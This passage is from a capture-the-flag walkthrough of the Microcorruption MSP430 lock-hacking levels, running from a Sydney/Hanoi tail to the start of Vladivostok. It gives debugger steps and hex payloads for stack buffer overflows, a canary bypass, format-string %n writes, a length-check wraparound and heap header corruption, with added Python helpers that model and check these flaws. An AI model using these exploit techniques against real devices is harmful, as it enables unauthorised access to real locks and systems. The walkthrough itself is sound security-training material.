Testing our calculations:
python -c "print('a' * 16 + '@')"
reset
c
c
Input: aaaaaaaaaaaaaaaa@
Send
c

screenshot 4

String that allows bypass: aaaaaaaaaaaaaaaa@

Type “solve”, input the “password” and send.

screenshot 5

Level 4: Reykjavik

OVERVIEW

– Lockitall developers have implemented military-grade on-device
encryption to keep the password secure.
– This lock is not attached to any hardware security module.

DETAILS

The LockIT Pro a.03 is the first of a new series of locks. It is
controlled by a MSP430 microcontroller, and is the most advanced
MCU-controlled lock available on the market. The MSP430 is a very
low-power device which allows the LockIT Pro to run in almost any
environment.

The LockIT Pro contains a Bluetooth chip allowing it to
communicate with the LockIT Pro App, allowing the LockIT Pro to
be inaccessible from the exterior of the building.

There is no default password on the LockIT Pro—upon receiving
the LockIT Pro, a new password must be set by connecting it to the
LockIT Pro App and entering a password when prompted, and then
restarting the LockIT Pro using the red button on the back.

This is Hardware Version A. It contains the Bluetooth connector
built in, and one available port to which the LockIT Pro Deadbolt
should be connected.

This is Software Revision 02. This release contains military-grade
encryption so users can be confident that the passwords they enter
can not be read from memory. We apologize for making it too easy
for the password to be recovered on prior versions. The engineers
responsible have been sacked.

Solution:
Break main and type “c”.

screenshot

Note the call to 0x2400.

Break 2400 and type “c”.

Type “read 2400 180”.

screenshot 2

Copy the output and paste it into a file “reykjavik.txt”.

Run “get_instructions.py”:
python get_instructions.py

screenshot 3

Copy the output, open the Assembler in a new tab, paste the output and click on “Disassemble”.

screenshot 4

Note the following instruction:
cmp    #0x869d, -0x24(r4)

Type “c” and input “aaaa”.

Notice the register state:

screenshot 5

As per the instruction: cmp    #0x869d, -0x24(r4)
-0x24(r4) = 0x43fe - 0x24 = 0x43da

Looking at the live memory dump, we can see that 0x43da is the start of our input.
This means the instruction is comparing our input to 0x869d.

Password (hex-encoded input): 9d86

Type “reset”, “solve”, and enter the password.

screenshot 6
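Both Sydney (four cmp immediates that spell r<[Q-XiO) and Reykjavik (one immediate, 0x869d, entered as 9d86) come down to the same detail: the MSP430 stores 16-bit words little-endian, so the low byte of each compared constant is the first character of the input. As an added example, not the game's code or the write-up's, here is a small converter that pulls cmp immediates out of a listing and turns them into the password in both directions. The listing is constructed to match the constants the write-up reports, not copied from the game's disassembly; function names are assumptions.

```python
# Added example (not part of the write-up): turning the 16-bit immediates
# of MSP430 cmp instructions back into the bytes they compare against.
# The listing below is constructed to match the constants the write-up
# reports; it is not the game's actual disassembly.
import re
import struct

# Matches "cmp #0x1234, ..." and "cmp.b #0x40, ..."; group 1 flags the byte form.
CMP_IMMEDIATE = re.compile(r"cmp(\.b)?\s+#0x([0-9a-fA-F]+)")

SYDNEY_LISTING = """
cmp   #0x3c72, 0x0(r15)
cmp   #0x515b, 0x2(r15)
cmp   #0x582d, 0x4(r15)
cmp   #0x4f69, 0x6(r15)
"""


def extract_compares(listing: str) -> list:
    """Return (is_byte, immediate) for every cmp/cmp.b with an immediate operand."""
    return [(bool(m.group(1)), int(m.group(2), 16))
            for m in CMP_IMMEDIATE.finditer(listing)]


def words_to_password(words) -> str:
    """Each word is stored little-endian: 0x3c72 is the bytes 72 3c, i.e. 'r<'."""
    return b"".join(struct.pack("<H", w) for w in words).decode("ascii")


def password_to_words(password: str) -> list:
    """Inverse: pair up bytes and read each pair as a little-endian word."""
    data = password.encode("ascii")
    if len(data) % 2:
        raise ValueError("password length must be even")
    return [struct.unpack("<H", data[i:i + 2])[0] for i in range(0, len(data), 2)]


def word_to_hex_input(word: int) -> str:
    """Hex to type into the debugger so the bytes land in memory in cmp order."""
    return struct.pack("<H", word).hex()


def listing_to_password(listing: str) -> str:
    """Word-sized compares in listing order give the expected input."""
    words = [imm for is_byte, imm in extract_compares(listing) if not is_byte]
    return words_to_password(words)


if __name__ == "__main__":
    print(listing_to_password(SYDNEY_LISTING))      # r<[Q-XiO
    print(word_to_hex_input(0x869d))                 # 9d86
    print(extract_compares("cmp.b #0x40, &0x2410"))  # [(True, 64)]  (Hanoi's '@')
```

Level 3's cmp.b #0x40 is the byte form and needs no swapping, which is why the regex keeps the .b flag separate.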

Level 5: Cusco

OVERVIEW

– We have fixed issues with passwords which may be too long.
– This lock is attached to the LockIT Pro HSM-1.

DETAILS

The LockIT Pro b.02 is the first of a new series of locks. It is
controlled by a MSP430 microcontroller, and is the most advanced
MCU-controlled lock available on the market. The MSP430 is a very
low-power device which allows the LockIT Pro to run in almost any
environment.

The LockIT Pro contains a Bluetooth chip allowing it to
communicate with the LockIT Pro App, allowing the LockIT Pro to
be inaccessible from the exterior of the building.

There is no default password on the LockIT Pro HSM-1. Upon
receiving the LockIT Pro, a new password must be set by first
connecting the LockitPRO HSM to output port two, connecting it to
the LockIT Pro App, and entering a new password when prompted, and
then restarting the LockIT Pro using the red button on the back.

LockIT Pro Hardware Security Module 1 stores the login password,
ensuring users can not access the password through other means.
The LockIT Pro can send the LockIT Pro HSM-1 a password, and the
HSM will return if the password is correct by setting a flag in
memory.

This is Hardware Version B. It contains the Bluetooth connector
built in, and two available ports: the LockIT Pro Deadbolt should
be connected to port 1, and the LockIT Pro HSM-1 should be
connected to port 2.

This is Software Revision 02. We have improved the security of the
lock by removing a conditional flag that could accidentally get
set by passwords that were too long.

Solution:
Break main and type “c”.

screenshot

screenshot 2

We will break at login’s ret address.

Break 453e and type “c”.
python -c "print('41' * 20)"

Input (hex-encoded): 4141414141414141414141414141414141414141
send
c

Type “read sp 8”.

screenshot 2

screenshot 3

Notice that our input starts at 0x43ee and the stack pointer is at 0x43fe
python -c "print(0x43fe - 0x43ee)"

The result is 16.

We will aim to perform a buffer overflow.

screenshot 4

unlock_door starts at 4446.
With the information we have, we can now bypass authentication by performing a buffer overflow.

Performing the buffer overflow:
python -c "print('41' * 16 + '4644')"

Password (hex encoded input): 414141414141414141414141414141414644

Type “reset”, “solve”, and enter the password.

screenshot 5

Level 6: Whitehorse

OVERVIEW

– This lock is attached to the LockIT Pro HSM-2.
– We have updated the lock firmware to connect with this hardware
security module.

DETAILS

The LockIT Pro c.01  is the first of a new series  of locks. It is
controlled by a  MSP430 microcontroller, and is  the most advanced
MCU-controlled lock available on the  market. The MSP430 is a very
low-power device which allows the LockIT  Pro to run in almost any
environment.

The  LockIT  Pro   contains  a  Bluetooth  chip   allowing  it  to
communicate with the  LockIT Pro App, allowing the  LockIT Pro to
be inaccessible from the exterior of the building.

There  is no  default  password  on the  LockIT  Pro HSM-2.   Upon
receiving the  LockIT Pro,  a new  password must  be set  by first
connecting the LockitPRO HSM to  output port two, connecting it to
the LockIT Pro App, and entering a new password when prompted, and
then restarting the LockIT Pro using the red button on the back.

LockIT Pro Hardware  Security Module 2 stores  the login password,
ensuring users  can not access  the password through  other means.
The LockIT Pro  can send the LockIT Pro HSM-2  a password, and the
HSM will  directly send the  correct unlock message to  the LockIT
Pro Deadbolt  if the password  is correct, otherwise no  action is
taken.

This is Hardware  Version C.  It contains  the Bluetooth connector
built in, and two available  ports: the LockIT Pro Deadbolt should
be  connected to  port  1,  and the  LockIT  Pro  HSM-2 should  be
connected to port 2.

This is  Software Revision  01. The firmware  has been  updated to
connect with the new hardware security module. We have removed the
function to unlock the door from the LockIT Pro firmware.

Solution:
Break main and type “c”.

screenshot

Break 4514 and type “c”.

screenshot 2

Break 452e and type “c”.
python -c "print '41' * 20"

Input (hex-encoded): 4141414141414141414141414141414141414141
Send
c

Type “read sp 8”.

screenshot 3
screenshot 4

Notice our input starts at 0x3600 and the stack pointer is at 0x3610.
This means the offset is 16.

We will aim to perform a buffer overflow by using the interrupt called by conditional_unlock_door.

screenshot 5

Looking at the manual, we can see that INT 0x7f is just what we need.

screenshot 6

This interrupt is at 4460.

Performing the buffer overflow:
python -c "print '41' * 16 + '60447f'"

Password (hex encoded input): 4141414141414141414141414141414160447f

Type “reset”, “solve”, and enter the password.

screenshot 7

Level 7: Montevideo

OVERVIEW

– Lockitall developers  have rewritten the code  to conform to the
internal secure development process.
– This lock is attached to the LockIT Pro HSM-2.

DETAILS

The LockIT Pro c.03  is the first of a new series  of locks. It is
controlled by a  MSP430 microcontroller, and is  the most advanced
MCU-controlled lock available on the  market. The MSP430 is a very
low-power device which allows the LockIT  Pro to run in almost any
environment.

The  LockIT  Pro   contains  a  Bluetooth  chip   allowing  it  to
communicate with the  LockIT Pro App, allowing the  LockIT Pro to
be inaccessible from the exterior of the building.

There  is no  default  password  on the  LockIT  Pro HSM-2.   Upon
receiving the  LockIT Pro,  a new  password must  be set  by first
connecting the LockitPRO HSM to  output port two, connecting it to
the LockIT Pro App, and entering a new password when prompted, and
then restarting the LockIT Pro using the red button on the back.

LockIT Pro Hardware  Security Module 2 stores  the login password,
ensuring users  can not access  the password through  other means.
The LockIT Pro  can send the LockIT Pro HSM-2  a password, and the
HSM will  directly send the  correct unlock message to  the LockIT
Pro Deadbolt  if the password  is correct, otherwise no  action is
taken.

This is Hardware  Version C.  It contains  the Bluetooth connector
built in, and two available  ports: the LockIT Pro Deadbolt should
be  connected to  port  1,  and the  LockIT  Pro  HSM-2 should  be
connected to port 2.

This is Software Revision 03. We have received unconfirmed reports
of issues with the previous series of locks. We have reimplemented
much  of the  code according  to our  internal Secure  Development
Process.

Solution:
Break main and type “c”.

screenshot

Notice that Montevideo looks very similar to Whitehorse.
We will try the same solution.

Trying the Whitehorse solution:
c

Input (hex-encoded): 4141414141414141414141414141414160447f
c

screenshot 2

The same solution works!

Type “reset”, “solve”, and enter the password.

screenshot 3

 

Level 8: Johannesburg

OVERVIEW

– A firmware update rejects passwords which are too long.
– This lock is attached to the LockIT Pro HSM-1.

DETAILS

The LockIT Pro b.04  is the first of a new series  of locks. It is
controlled by a  MSP430 microcontroller, and is  the most advanced
MCU-controlled lock available on the  market. The MSP430 is a very
low-power device which allows the LockIT  Pro to run in almost any
environment.

The  LockIT  Pro   contains  a  Bluetooth  chip   allowing  it  to
communicate with the  LockIT Pro App, allowing the  LockIT Pro to
be inaccessible from the exterior of the building.

There  is no  default  password  on the  LockIT  Pro HSM-1.   Upon
receiving the  LockIT Pro,  a new  password must  be set  by first
connecting the LockitPRO HSM to  output port two, connecting it to
the LockIT Pro App, and entering a new password when prompted, and
then restarting the LockIT Pro using the red button on the back.

LockIT Pro Hardware  Security Module 1 stores  the login password,
ensuring users  can not access  the password through  other means.
The LockIT Pro  can send the LockIT Pro HSM-1  a password, and the
HSM will  return if the password  is correct by setting  a flag in
memory.

This is Hardware  Version B.  It contains  the Bluetooth connector
built in, and two available  ports: the LockIT Pro Deadbolt should
be  connected to  port  1,  and the  LockIT  Pro  HSM-1 should  be
connected to port 2.

This is Software Revision 04. We have improved the security of the
lock by ensuring passwords that are too long will be rejected.

Solution:
Break main and type “c”.

screenshot

screenshot 2

Notice that 0x4578 in login has cmp.b    #0x18, 0x11(sp).

Break 4590 and type “c” twice.
python -c "print '41' * 16"

Input (hex-encoded): 41414141414141414141414141414141
Send
c

screenshot 3

Notice that there is a 0x18 byte located 18 bytes after our input.
This 0x18 acts as a stack canary.
Stack canaries are known values placed on the stack just before the saved return address. Like canaries in a coal mine, if the value has been overwritten by the time the function returns, the program knows there was a buffer overflow attempt.

screenshot 4

Notice that unlock_door starts at address 4446.

Performing the buffer overflow:
python -c "print '41' * 17 + '18' + '4644'"

Password (hex encoded input): 4141414141414141414141414141414141184644

Type “reset”, “solve”, and enter the password.

screenshot 5

Level 9: Addis Ababa

OVERVIEW

– We have verified passwords can not be too long.
– Usernames are printed back to the user for verification.
– This lock is attached to the LockIT Pro HSM-1.

DETAILS

The LockIT Pro b.03  is the first of a new series  of locks. It is
controlled by a  MSP430 microcontroller, and is  the most advanced
MCU-controlled lock available on the  market. The MSP430 is a very
low-power device which allows the LockIT  Pro to run in almost any
environment.

The  LockIT  Pro   contains  a  Bluetooth  chip   allowing  it  to
communicate with the  LockIT Pro App, allowing the  LockIT Pro to
be inaccessible from the exterior of the building.

There  is no  default  password  on the  LockIT  Pro HSM-1.   Upon
receiving the  LockIT Pro,  a new  password must  be set  by first
connecting the LockitPRO HSM to  output port two, connecting it to
the LockIT Pro App, and entering a new password when prompted, and
then restarting the LockIT Pro using the red button on the back.

LockIT Pro Hardware  Security Module 1 stores  the login password,
ensuring users  can not access  the password through  other means.
The LockIT Pro  can send the LockIT Pro HSM-1  a password, and the
HSM will  return if the password  is correct by setting  a flag in
memory.

This is Hardware  Version B.  It contains  the Bluetooth connector
built in, and two available  ports: the LockIT Pro Deadbolt should
be  connected to  port  1,  and the  LockIT  Pro  HSM-1 should  be
connected to port 2.

This is Software Revision 03. We have improved the security of the
lock by ensuring passwords can not be too long.

Solution:
Break main and type “c”.

screenshot

Notice the use of “printf”. This means that format string vulnerabilities could be one vector of attack.

Break at the tst instruction (448a) and type “c”.

screenshot 3

At the input prompt, enter nothing and type “c”.

screenshot 2

Notice that the address being tested is 0x3c50.
This means we have to write a non-zero number to that address in order to skip the jz instruction and call unlock_door.

Testing the format string theory:
reset
c
c

Input: 503c%i%n

screenshot 4

A format string attack is possible.
The %n directive writes the number of characters printed so far to the address supplied at the start of our input, 0x3c50 (given little-endian as 503c), hence giving us the non-zero number.
In this case, the %n will write a 2.

Confirming our attack:
reset
c
c

Input: 503c2569256e

screenshot 5

Our attack works. Time to solve the challenge.

Password (hex encoded input): 503c2569256e

Type “reset”, “solve”, and enter the password.

screenshot 6

 

Level 10: Santa Cruz

OVERVIEW

– A firmware update further rejects passwords which are too long.
– This lock is attached to the LockIT Pro HSM-1.

DETAILS

The LockIT Pro b.05  is the first of a new series  of locks. It is
controlled by a  MSP430 microcontroller, and is  the most advanced
MCU-controlled lock available on the  market. The MSP430 is a very
low-power device which allows the LockIT  Pro to run in almost any
environment.

The  LockIT  Pro   contains  a  Bluetooth  chip   allowing  it  to
communicate with the  LockIT Pro App, allowing the  LockIT Pro to
be inaccessible from the exterior of the building.

There  is no  default  password  on the  LockIT  Pro HSM-1.   Upon
receiving the  LockIT Pro,  a new  password must  be set  by first
connecting the LockitPRO HSM to  output port two, connecting it to
the LockIT Pro App, and entering a new password when prompted, and
then restarting the LockIT Pro using the red button on the back.

LockIT Pro Hardware  Security Module 1 stores  the login password,
ensuring users  can not access  the password through  other means.
The LockIT Pro  can send the LockIT Pro HSM-1  a password, and the
HSM will  return if the password  is correct by setting  a flag in
memory.

This is Hardware  Version B.  It contains  the Bluetooth connector
built in, and two available  ports: the LockIT Pro Deadbolt should
be  connected to  port  1,  and the  LockIT  Pro  HSM-1 should  be
connected to port 2.

This is Software Revision 05.  We have added further mechanisms to
verify that passwords which are too long will be rejected.

Solution:
Break main and type “c”.
screenshot

Notice the address of unlock_door is 0x444a.

Type “c”, enter a username and password, and type “c” again.

screenshot 2
screenshot 3
screenshot 4

Notice the following addresses:
user is at 0x43a2
password is at 0x43b5
stack pointer is at 0x43a0
ret address is at 0x43cc

Inspect the login function:
Notice the mov.b -0x18(r4), r15 at login’s 0x45e4

Type “read r4-18”:

screenshot 5

The resulting address is 0x43b4 and it holds the value 0x10.
Notice the mov.b -0x19(r4), r15 at login’s 0x45fa

Type “read r4-19”:

screenshot 6

The resulting address is 0x43b3 and it holds the value 0x08.
Notice the tst.b -0x6(r4) at login’s 0x464c and the jz #0x465e <login+0x10e> at login’s 0x4650.

Type “read r4-6”:

screenshot 7

The resulting address is 0x43c6, meaning 0x43c6 must be 0x0.
We want to overwrite the ret address with that of unlock_door.
We also want to make sure that the value at 0x43b3 is lower than our password length and the value at 0x43b4 is higher than our password length.

Use Python to make calculations:
python -c "print 0x43cc - 0x43a2"
The result is 42

python -c "print ('61' * 17) + '01' + ('61' * 24) + '4a44'"
The result will be our username

We want to overwrite the 0x43c6 address with 0x0
python -c "print 0x43c6 - 0x43b5"
The result is 17

python -c "print '62' * 17 + '00'"
The result will be our password

Testing the theory:
reset
c
c
user (hex-encoded): 6161616161616161616161616161616161016161616161616161616161616161616161616161616161614a44
c
pass (hex-encoded): 626262626262626262626262626262626200
c

screenshot 8

We have our solution and are ready to pass the challenge.

Username (Hex encoded input): 6161616161616161616161616161616161016161616161616161616161616161616161616161616161614a44
Password (Hex encoded input): 626262626262626262626262626262626200

Type “reset”, “solve”, and enter the password.

screenshot 9

Level 11: Jakarta

OVERVIEW

– A firmware update further rejects passwords which are too long.
– This lock is attached to the LockIT Pro HSM-1.

DETAILS

The LockIT Pro b.06  is the first of a new series  of locks. It is
controlled by a  MSP430 microcontroller, and is  the most advanced
MCU-controlled lock available on the  market. The MSP430 is a very
low-power device which allows the LockIT  Pro to run in almost any
environment.

The  LockIT  Pro   contains  a  Bluetooth  chip   allowing  it  to
communicate with the  LockIT Pro App, allowing the  LockIT Pro to
be inaccessible from the exterior of the building.

There  is no  default  password  on the  LockIT  Pro HSM-1.   Upon
receiving the  LockIT Pro,  a new  password must  be set  by first
connecting the LockitPRO HSM to  output port two, connecting it to
the LockIT Pro App, and entering a new password when prompted, and
then restarting the LockIT Pro using the red button on the back.

LockIT Pro Hardware  Security Module 1 stores  the login password,
ensuring users  can not access  the password through  other means.
The LockIT Pro  can send the LockIT Pro HSM-1  a password, and the
HSM will  return if the password  is correct by setting  a flag in
memory.

This is Hardware  Version B.  It contains  the Bluetooth connector
built in, and two available  ports: the LockIT Pro Deadbolt should
be  connected to  port  1,  and the  LockIT  Pro  HSM-1 should  be
connected to port 2.

This is Software Revision 06.  We have added further mechanisms to
verify that passwords which are too long will be rejected.

Solution:

Break main and type “c”.

screenshot

Notice unlock_door is at 0x444c.
We will use the interrupt at 4450 to unlock the door.

screenshot 2

Notice the cmp.b #0x21, r11 in login’s 0x45ae.
This checks the username length against the 0x20 limit.

screenshot 3

Notice the add r11, r15 at 0x45fe and the cmp.b #0x21, r15 at 0x4600.
These check the combined length of user and pass against 0xff; because cmp.b compares only the low byte, the combined length is effectively taken modulo 256.

Type “c” and use Python to calculate the username:
c
python -c "print '61' * 32"
Input (hex-encoded): 6161616161616161616161616161616161616161616161616161616161616161

screenshot 4

Type “c” and use Python to calculate the password:
c
python -c "print '61' * 4 + '4c44' + '62' * 218"
Input: 616161614c446262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262

Type “c” twice:
c
c

screenshot 5

We have our solution and can now pass the challenge.

Username (Hex encoded input): 6161616161616161616161616161616161616161616161616161616161616161

Password (Hex encoded input): 616161614c446262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262

Type “reset”, “solve”, and enter the password.

screenshot 6

 

Level 12: Novosibirsk

OVERVIEW

– This lock is attached to the LockIT Pro HSM-2.
– We have added features from b.03 to the new hardware.

DETAILS

The LockIT Pro c.02  is the first of a new series  of locks. It is
controlled by a  MSP430 microcontroller, and is  the most advanced
MCU-controlled lock available on the  market. The MSP430 is a very
low-power device which allows the LockIT  Pro to run in almost any
environment.

The  LockIT  Pro   contains  a  Bluetooth  chip   allowing  it  to
communicate with the  LockIT Pro App, allowing the  LockIT Pro to
be inaccessible from the exterior of the building.

There  is no  default  password  on the  LockIT  Pro HSM-2.   Upon
receiving the  LockIT Pro,  a new  password must  be set  by first
connecting the LockitPRO HSM to  output port two, connecting it to
the LockIT Pro App, and entering a new password when prompted, and
then restarting the LockIT Pro using the red button on the back.

LockIT Pro Hardware  Security Module 2 stores  the login password,
ensuring users  can not access  the password through  other means.
The LockIT Pro  can send the LockIT Pro HSM-2  a password, and the
HSM will  directly send the  correct unlock message to  the LockIT
Pro Deadbolt  if the password  is correct, otherwise no  action is
taken.

This is Hardware  Version C.  It contains  the Bluetooth connector
built in, and two available  ports: the LockIT Pro Deadbolt should
be  connected to  port  1,  and the  LockIT  Pro  HSM-2 should  be
connected to port 2.

This is Software Revision 02. We have improved the security of the
lock by ensuring passwords can not be too long.

Solution:

Break main and type “c”.

screenshot

screenshot 2

Notice the printf; there may be a format string vulnerability.

Break at 0x448e, which is a test:
break 448e
c
Input: aaaa
c

screenshot 3

Notice that conditional_unlock_door pushes 0x7e to INT at 0x44c6.

We want to overwrite it with 0x7f, so that INT 0x7f gets called instead.
0x7f = 127

So we can do:
0x44c8 + 125 A’s + %n

The %n will overwrite the 0x7e with 0x7f (127).
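As an added example (not from the write-up or from the lock firmware), the following Python models the printf `%n` rule that both the Addis Ababa and Novosibirsk solutions rely on, and puts the hardened call beside it. It assumes a constructed layout in which the variadic arguments are read from the input buffer itself, so the first word of the input becomes the address `%n` writes to; the 16-bit word width and all function names are assumptions of the model.

```python
import struct

WORD = 2  # assumed: MSP430 pointers and registers are 16 bits wide


class FormatStringError(Exception):
    """A directive needed an argument that was not supplied."""


def model_printf(fmt: bytes, memory: dict, arg_words: list) -> bytes:
    """Interpret fmt the way a C printf would, consuming arg_words in order.

    Supports literal bytes, %%, %x, %i, %s and %n.  %n prints nothing: it
    stores the number of bytes emitted so far into the 16-bit word whose
    address is the next argument.  Writes are recorded in `memory`.
    """
    out = bytearray()
    args = iter(arg_words)
    i = 0
    while i < len(fmt):
        if fmt[i] != 0x25:          # 0x25 is '%': copy ordinary bytes through
            out.append(fmt[i])
            i += 1
            continue
        spec = fmt[i + 1:i + 2]
        i += 2
        if spec == b"%":
            out.append(0x25)
            continue
        try:
            arg = next(args)
        except StopIteration:
            raise FormatStringError("directive %%%s has no argument" % spec.decode("latin-1")) from None
        if spec == b"x":
            out += b"%x" % arg
        elif spec == b"i":
            out += b"%d" % arg
        elif spec == b"s":
            out += arg
        elif spec == b"n":
            memory[arg] = len(out) & 0xFFFF   # the write the walkthrough relies on
        else:
            raise FormatStringError("unsupported directive %%%s" % spec.decode("latin-1"))
    return bytes(out)


def words_of(buf: bytes) -> list:
    """Split buf into little-endian 16-bit words; a trailing odd byte is dropped."""
    usable = len(buf) - len(buf) % WORD
    return [struct.unpack_from("<H", buf, off)[0] for off in range(0, usable, WORD)]


def vulnerable_echo(user_input: bytes, memory: dict) -> bytes:
    """printf(user_input): the input is both the format string and, on this
    constructed stack layout, the source of the variadic arguments."""
    return model_printf(user_input, memory, words_of(user_input))


def hardened_echo(user_input: bytes, memory: dict) -> bytes:
    """printf("%s", user_input): the input is data only, so a %n inside it is inert."""
    return model_printf(b"%s", memory, [user_input])


def has_format_directives(user_input: bytes) -> bool:
    """Input-side check worth logging on: a '%' in untrusted text that reaches
    a printf-family call as the format argument is suspicious."""
    return b"%" in user_input


def percent_n_value(target: int, padding: int) -> int:
    """Value %n stores at `target` when the input is the 2-byte target address,
    `padding` filler bytes and then %n.  The two address bytes are counted too:
    padding 0 stores 2 (the Addis Ababa case, any non-zero value suffices),
    padding 125 stores 127 = 0x7f (the Novosibirsk case)."""
    memory = {}
    payload = struct.pack("<H", target) + b"A" * padding + b"%n"
    vulnerable_echo(payload, memory)
    return memory[target]


if __name__ == "__main__":
    sample = b"\x50\x3c%n"          # constructed input: address 0x3c50, then %n
    mem = {}
    print(vulnerable_echo(sample, mem), {hex(k): v for k, v in mem.items()})
    mem = {}
    print(hardened_echo(sample, mem), mem)   # same bytes echoed, nothing written
```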

Testing the format string theory:
reset
c
c
python -c "print '44c8' + 'A' * 125"

Input: 44c8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%n

screenshot 4

Our exploit will look like: c844 + (125 A’s) + 256e

Testing our format string theory:
reset
c
c
Input (hex-encoded): c8446161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161256e

screenshot 5

We have our solution and can now pass the challenge.

Username (Hex encoded input): c8446161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161256e

Type “reset”, “solve”, and enter the password.

screenshot 6

 

Level 13: Algiers

OVERVIEW

– This lock contains the all-new LockIT Pro Account Manager.

DETAILS

The LockIT Pro d.01  is the first of a new series  of locks. It is
controlled by a  MSP430 microcontroller, and is  the most advanced
MCU-controlled lock available on the  market. The MSP430 is a very
low-power device which allows the LockIT  Pro to run in almost any
environment.

The  LockIT  Pro   contains  a  Bluetooth  chip   allowing  it  to
communiciate with the  LockIT Pro App, allowing the  LockIT Pro to
be inaccessable from the exterior of the building.

LockIT Pro Account Manager solves the problem of sharing passwords
when  multiple users  must  have  access to  a  lock. The  Account
Manager contains  a mapping of users  to PINs, each of  which is 4
digits.  The  system supports  hundreds of users,  each configured
with his or her own PIN,  without degrading the performance of the
manager.

There are no accounts set up  on the LockIT Pro Account Manager by
default. An administrator must first initialize the lock with user
accounts  and  their  PINs.  User  accounts  are  by  default  not
authorized  for access,  but can  be authorized  by attaching  the
Account  Manager  Authorizer.  This  prevents  users  from  adding
themselves to the lock during its use.

This is Hardware  Version D.  It contains  the Bluetooth connector
built in, and one available port, to which the LockIT Pro Deadbolt
should be connected. When authorizing PINs, the Deadbolt should be
disconnected and the Authorizer should be attached in its place.

This   is  Software   Revision   01.  It is a  much more  advanced
version of other locks, but the first Version D release.

Solution:
Break main and type “c” two times.
user: aaaa
pass: bbbb
c
screenshot

Notice that we have metadata headers before our input.

The header contains:
(1) Pointer to the previous block
(2) Pointer to the next block
(3) The size of the block
(4) Status of the block; whether it’s allocated or free

We have two blocks, each 16 bytes big, right next to each other.
Also notice that there is no check on the length of the input.
This means we can overwrite the header of the second block and make it point wherever we want.
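As an added example (not from the write-up or from the firmware), this Python models the block headers described above and shows the consistency check an allocator can run before trusting them. The header layout (three little-endian words: previous pointer, next pointer, size with the low bit as the in-use flag), the heap base 0x2400 and all function names are assumptions constructed for the model.

```python
import struct
from dataclasses import dataclass

HEADER_LEN = 6          # assumed layout: three 16-bit words, prev, next, size|in_use
BLOCK_DATA = 16         # the walkthrough observes two 16-byte blocks
HEAP_BASE = 0x2400      # constructed for this model, not read from the firmware
HEAP_END = HEAP_BASE + 0x100


@dataclass
class Block:
    addr: int
    prev: int
    next: int
    size: int
    in_use: bool


def parse_header(mem: bytearray, addr: int) -> Block:
    """Decode the three-word header at addr (little-endian)."""
    prev, nxt, size_word = struct.unpack_from("<HHH", mem, addr - HEAP_BASE)
    return Block(addr, prev, nxt, size_word & ~1, bool(size_word & 1))


def in_heap(addr: int) -> bool:
    """True when a full header at addr lies inside the heap region."""
    return HEAP_BASE <= addr < HEAP_END - HEADER_LEN


def walk_heap(mem: bytearray, first: int) -> list:
    """Follow next pointers from `first`, stopping at 0, a loop, or an address
    outside the heap so corrupted metadata cannot make us read anywhere."""
    blocks, addr, seen = [], first, set()
    while addr and addr not in seen and in_heap(addr):
        seen.add(addr)
        block = parse_header(mem, addr)
        blocks.append(block)
        addr = block.next
    return blocks


def check_heap(mem: bytearray, first: int) -> list:
    """Consistency checks to run before acting on a header: the kind of check
    that turns a clobbered header into a detected fault rather than a jump to
    an attacker-chosen address.  Returns findings; an empty list is consistent."""
    findings = []
    blocks = walk_heap(mem, first)
    for i, b in enumerate(blocks):
        if b.prev and not in_heap(b.prev):
            findings.append(f"{b.addr:#06x}: prev {b.prev:#06x} points outside the heap")
        if b.next and not in_heap(b.next):
            findings.append(f"{b.addr:#06x}: next {b.next:#06x} points outside the heap")
        if i and b.prev != blocks[i - 1].addr:
            findings.append(f"{b.addr:#06x}: prev {b.prev:#06x} does not link back to {blocks[i - 1].addr:#06x}")
        if b.next and b.next != b.addr + HEADER_LEN + b.size:
            findings.append(f"{b.addr:#06x}: next {b.next:#06x} disagrees with size {b.size}")
    return findings


def build_heap(user: bytes, password: bytes) -> bytearray:
    """Lay out two adjacent in-use blocks and copy both inputs with no length
    check, the defect the walkthrough points at (constructed model)."""
    mem = bytearray(HEAP_END - HEAP_BASE)
    first = HEAP_BASE
    second = first + HEADER_LEN + BLOCK_DATA
    struct.pack_into("<HHH", mem, first - HEAP_BASE, 0, second, BLOCK_DATA | 1)
    struct.pack_into("<HHH", mem, second - HEAP_BASE, first, 0, BLOCK_DATA | 1)
    for block, data in ((first, user), (second, password)):
        start = block + HEADER_LEN - HEAP_BASE
        mem[start:start + len(data)] = data      # unchecked copy into a 16-byte block
    return mem


if __name__ == "__main__":
    print("clean:", check_heap(build_heap(b"aaaa", b"bbbb"), HEAP_BASE))
    # 16 bytes fill the first block; the next 6 land on the second block's header
    overlong = b"A" * 16 + bytes.fromhex("444462450100")
    for finding in check_heap(build_heap(overlong, b""), HEAP_BASE):
        print("corrupt:", finding)
```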

screenshot 2

Notice that unlock_door is at 0x4564 and free’s ret address is right behind it at 0x4562.
This means we can use NOPs to slide into unlock_door.

The exploit will look like:
16 A’s + 4444 + 6245 + 0100

Generate the exploit with Python:
python -c "print '61' * 16 + '4444' + '6245' + '0100'"

Testing the theory:
reset
c
c
user (hex-encoded): 61616161616161616161616161616161444462450100
pass: <blank>
c
c

screenshot 3

We have our solution and can now pass the challenge.

Username (Hex encoded input): 61616161616161616161616161616161444462450100

Type “reset”, “solve”, and enter the password.

screenshot 4

 

Level 14: Vladivostok

OVERVIEW

– Lockitall  developers further used the hardware randomization to
improve lock security.
– This lock is attached to the LockIT Pro HSM-2.

DETAILS

The LockIT Pro c.05  is the first of a new series  of locks. It is
controlled by a  MSP430 microcontroller, and is  the most advanced
MCU-controlled lock available on the  market. The MSP430 is a very
